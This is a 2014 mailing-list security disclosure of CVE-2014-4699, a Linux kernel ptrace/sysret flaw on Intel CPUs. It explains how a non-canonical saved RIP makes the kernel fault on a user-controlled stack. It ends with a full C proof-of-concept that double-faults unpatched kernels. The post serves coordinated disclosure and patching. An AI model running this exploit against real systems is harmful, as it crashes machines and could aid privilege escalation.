Date: Tue, 08 Jul 2014 15:22:36 -0700
From: Andy Lutomirski
Subject: Re: CVE-2014-4699: Linux ptrace bug

On 07/04/2014 02:05 PM, Andy Lutomirski wrote:
> Hi everyone-
> Upstream commit b9cd18de4db3c9ffa7e17b0dc0ca99ed5aa4d43a fixes a
> ptrace bug.  The exact scope of the bug is somewhat unclear right now.
> I see no reason why the bug should not be present as far back as Linux
> 2.6.17, but it seems to be difficult to reproduce on old kernels.
> There is some ongoing discussion on linux-distros about the impact and
> applicability of this bug.
> More details and a PoC to follow some time next week.
> I'm being intentionally vague here: this bug has existed for a long
> time, but exploiting it at all is tricky enough (and possibly
> kernel-version dependent enough) that it's gone unnoticed.  I would
> currently prefer to give the distros and users a bit of a headstart
> before publicly disclosing the complete details of how to test/exploit
> the bug.  It is likely to have a high enough impact, at least on new
> enough kernels, that it should be patched ASAP.

Time for full details.

Intel CPUs implement sysret oddly: sysret will #GP *from kernel mode* if
RIP/RCX is non-canonical.  This is only a problem because sysret does
not affect RSP, so the kernel needs to load the user's RSP value prior
to running sysret.  That means that an exception frame will be written
to the address at RSP, which is necessarily user-controlled.  If RSP is
a writable user address and the CPU does not have SMAP, then the
kernel's general_protection handler will actually execute from a
user-controlled stack, and user code can attempt to race with the kernel
to take over the system.
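
To make "non-canonical" concrete, here is a minimal sketch of the check, assuming 48-bit virtual addresses (4-level paging). The helper name is_canonical_48 is made up for illustration and is not a kernel function.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Assumption: 48-bit virtual addresses (4-level paging).
 * An address is canonical when bits 63..47 are all copies of bit 47,
 * i.e. the top 17 bits are either all zero or all one.
 */
static bool is_canonical_48(uint64_t addr)
{
	uint64_t top = addr >> 47;	/* the 17 bits 63..47 */

	return top == 0 || top == 0x1ffff;
}
```

Under that assumption, 1ULL << 48 is non-canonical (only bit 48 is set), while 0x00007fffffffffff and 0xffff800000000000 are both canonical.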

Even on SMAP systems (which no one has yet anyway), it's possible to set
RSP to point to an important kernel data structure and overwrite it in a
partially controlled manner.  Overwriting the IDT like this was
traditional, but that's difficult now on Linux, since the public IDT
address is read-only.
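
As a rough illustration of which memory such a fault touches, the sketch below computes the range covered by the exception frame. It assumes the usual 64-bit behavior: the CPU aligns RSP down to 16 bytes and then pushes six 8-byte values (SS, RSP, RFLAGS, CS, RIP and the error code). The struct and function names are hypothetical.

```c
#include <stdint.h>

/* SS, RSP, RFLAGS, CS, RIP, error code: six 8-byte slots (assumed layout). */
#define GP_FRAME_WORDS 6

/* Hypothetical helper type: the half-open range [low, high) that is written. */
struct write_range {
	uint64_t low;	/* lowest byte written */
	uint64_t high;	/* one past the highest byte written */
};

/* Range overwritten when the #GP frame is pushed at the given RSP. */
static struct write_range gp_frame_range(uint64_t rsp_at_fault)
{
	struct write_range r;

	r.high = rsp_at_fault & ~(uint64_t)0xf;	/* 16-byte alignment */
	r.low = r.high - GP_FRAME_WORDS * sizeof(uint64_t);
	return r;
}
```

With RSP = 0x1008, for instance, this model gives the 48 bytes from 0xfd0 up to (but not including) 0x1000.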

If RSP points somewhere non-writable, then sysret will double-fault and
OOPS cleanly on an IST stack.

The upshot is that allowing user code to set the saved RIP address to a
non-canonical value in a non-IRET-using system call is bad.  On recent
unpatched kernels, this can be done using fork(2).  On other kernels,
there may or may not be other attack vectors.
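
The rule in the previous paragraph can be modeled in user space as below. This is a toy sketch, not the upstream patch: the types, the names, and the 48-bit canonical check are all assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical model of the saved user state; not a kernel structure. */
struct saved_regs {
	uint64_t rip;
	uint64_t rsp;
};

enum return_path { RETURN_SYSRET, RETURN_IRET };

/* Assumes 48-bit virtual addresses: bits 63..47 must all be equal. */
static bool rip_is_canonical(uint64_t rip)
{
	uint64_t top = rip >> 47;

	return top == 0 || top == 0x1ffff;
}

/*
 * Use the fast sysret path only when the saved RIP cannot make sysret
 * fault. If a tracer may have rewritten the registers, or RIP is
 * non-canonical, fall back to IRET.
 */
static enum return_path choose_return_path(const struct saved_regs *regs,
					   bool regs_touched_by_tracer)
{
	if (regs_touched_by_tracer || !rip_is_canonical(regs->rip))
		return RETURN_IRET;
	return RETURN_SYSRET;
}
```

In this model, the RIP value that the proof of concept pokes into the child (1ULL << 48) always selects RETURN_IRET.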

The upstream fix also addresses a related bug: the sysret path failed to
restore some registers on the same fork(2) path.  This could potentially
cause gdb to malfunction.

I've attached a proof-of-concept exploit.  It double-faults reliably on
unpatched kernels running on Intel CPUs.  The precise cause of the
double-fault is left as an exercise to the reader :)


#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <err.h>

/* Wait for the child to stop with a ptrace trap and return its siginfo. */
static siginfo_t wait_trap(pid_t chld)
{
	siginfo_t si;
	if (waitid(P_PID, chld, &si, WEXITED|WSTOPPED) != 0)
		err(1, "waitid");
	if (si.si_pid != chld)
		errx(1, "got unexpected pid in event\n");
	if (si.si_code != CLD_TRAPPED)
		errx(1, "got unexpected event type %d\n", si.si_code);
	return si;
}

int main(void)
{
	unsigned long tmp;

	pid_t chld = fork();
	if (chld < 0)
		err(1, "fork");

	if (chld == 0) {
		if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0)
			err(1, "PTRACE_TRACEME");

		/* Stop so the parent can enable fork tracing, then fork. */
		raise(SIGSTOP);
		fork();
		return 0;
	}

	int status;

	/* Wait for SIGSTOP and enable fork tracing. */
	if (waitpid(chld, &status, 0) != chld || !WIFSTOPPED(status))
		err(1, "waitpid");

	if (ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK) != 0)
		err(1, "PTRACE_SETOPTIONS");
	if (ptrace(PTRACE_CONT, chld, 0, 0) != 0)
		err(1, "PTRACE_CONT");

	/* Wait for the child to stop inside fork(2). */
	wait_trap(chld);

	errno = 0;
	tmp = ptrace(PTRACE_PEEKUSER, chld,
		     offsetof(struct user_regs_struct, rip), NULL);
	if (errno)
		err(1, "PTRACE_PEEKUSER");
	printf("child RIP = 0x%lx\n", tmp);

	/* Set the saved RIP to a non-canonical address. */
	if (ptrace(PTRACE_POKEUSER, chld,
		   offsetof(struct user_regs_struct, rip), (void *)(1ULL << 48)) != 0)
		err(1, "PTRACE_POKEUSER");

	errno = 0;
	tmp = ptrace(PTRACE_PEEKUSER, chld,
		     offsetof(struct user_regs_struct, rip), NULL);
	if (errno)
		err(1, "PTRACE_PEEKUSER");
	printf("child RIP = 0x%lx\n", tmp);

	/* Resume the child; the return from fork(2) uses the poisoned RIP. */
	if (ptrace(PTRACE_CONT, chld, 0, 0) != 0)
		err(1, "PTRACE_CONT");
	ptrace(PTRACE_DETACH, chld, 0, 0);

	return 0;
}
